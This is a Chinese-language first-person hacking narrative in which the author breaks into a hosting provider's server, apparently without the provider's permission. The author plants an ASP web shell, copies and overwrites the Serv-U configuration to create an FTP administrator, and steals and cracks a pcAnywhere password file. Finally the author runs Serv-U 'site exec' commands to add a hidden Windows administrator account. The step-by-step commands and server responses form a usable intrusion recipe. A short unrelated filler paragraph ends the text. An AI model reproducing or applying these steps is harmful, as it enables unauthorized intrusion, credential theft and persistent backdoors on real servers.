[摘要]最近的一次渗透半夜2点多了,在和QQ上一个好友聊天,也不知道怎么的叫我测试他的空间商的服务器是不是安全,二话不说先发个 海阳木马上去 1,初战告捷 打开IE 输入 http://domain.com...
最近的一次渗透半夜2点多了,在和QQ上一个好友聊天,也不知道怎么的叫我测试他的空间商的服务器是不是安全,二话不说先发个 海阳木马上去
1,初战告捷
打开IE 输入 http://domain.com/mail.asp (mail.asp是我给木马改的名字),习惯的先输入密码,和我想的一样,服务器禁止了FSO!!没办法退回来,看看能不能浏览目录,c:\ 发送命令 ,good~~ 居然可以
C:\Documents and Settings-----0
C:\Inetpub-----0
C:\Program Files-----0
C:\WINNT-----0
C:\Inetpub 没删 看看scripts映射有没有删掉,http://ip/scripts,返回404,删掉了管理员还不错,但没有取消分区的everyone的所有权限让他的服务器受到致命的打击!
在ie 输入 ftp://ip 返回 serv-u 什么不能匿名登陆,不过这个已经够了,确认了他的ftp服务器段用的什么软件,找吧,一般serv-u会装在C:\Program Files ,C:\Program Files 发送命令 ,没有:(,d:\ 发送命令 看到D:\Program Files,肯定就在里面我心里想,果然看到了D:\Program Files\Serv-u,谢天谢地!接下来我需要获得ServUDaemon.ini这个文件,海阳木马提供了copy 功能
D:\Program Files\Serv-u\ServUDaemon.ini copy E:\www\我的朋友的目录\
发送命令
Great ~~ 显示 command completed success 成功
在ie 输入 http://domain.com/ServUDaemon.ini 把ServUDaemon.ini down下来了
接着把ServUDaemon.ini 拷贝到 本地机的serv-u里,(我的电脑上安装了serv-u,你如果没有安装一个,在肉鸡上下载文件也很方便),打开 serviadmin ,你就会看到 肉鸡上的ftp用户了,不过 这些用户的口令是加密!不管他我们要获得是管理员,添加一个用户,把他添加成管理员,保存!把这个新的ServUDaemon.ini 发给我朋友,叫他用ftp上传,覆盖掉原来web目录里的
ok~~接下来没他的事了!!:)
D:\Program Files\Serv-u\ServUDaemon.ini move E:\www\我的朋友的目录\bbs
command completed success
(注意:这里一定要先移除掉 ServUDaemon.ini 海阳木马不会自动覆盖)
D:\Program Files\Serv-u\ 看看ServUDaemon.ini 是不是移除了,确实没有了
E:\www\我的朋友的目录\ServUDaemon.ini copy D:\Program Files\Serv-u\
command completed success
到这里只要服务器重起,我们就获得了ftp的管理员权限,可以通过本地机的servu 远程连接 肉鸡上的 servu !渗透基本成功
2,意外的发现
弄了半天,我还没扫描过他的服务器,不要弄出什么弱口令什么的,前面做的可真是笑话!:) 当然扫描结果没有这些,却意外的发现了5631 5632 端口,呵呵~~直到是什么的吗?pcanywhere的,去吧pcanywhere的密码文件down 下来,用流光看密码^o^ ,一般pcanywhere的密码文件都是放在
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 目录,PCA.*****.cif
这个文件就是了
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.23212.cif copy E:\www\我的朋友的目录\
http://domain.com/PCA.23212.cif
用流光读取了密码,顺利的连上了肉鸡,当然肉鸡是锁定的,不然可以直接装后门了!
但最大的收获,pcanywhere可以重起服务器,哈哈哈!我现在是ftp的管理员了
远程连上肉鸡的servu,创建了一个naxin的用户,添加了 主目录 指向d:\www 并添加c d e f 分区的映射,全部权限!现在我控制着服务器的生杀大权,虽然不是系统管理员,但可以通过ftp删除文件,嘎嘎嘎~~ 然而我发现ftp只能用port模式连接,在后面的渗透埋下了阴影
3,最后的胜利
入侵者有着强烈的控制欲,我当然不会甘心只得到ftp的管理员,我要的是系统管理员!
用过serv-u的应该看到有个执行权限吧!嗬嗬用它就可以来添加管理员,具体命令
shell>ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (ip:(none)): id
331 User name okay, please send complete E-mail address as password.
Password:password
230 User logged in, proceed.
ftp> cd winnt
250 Directory changed to /WINNT
ftp>cd system32
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user cnaxin$ 123 /add
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators cnaxin$ /add
哈哈哈!完成了!!
网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。
关键词:最近的一次渗透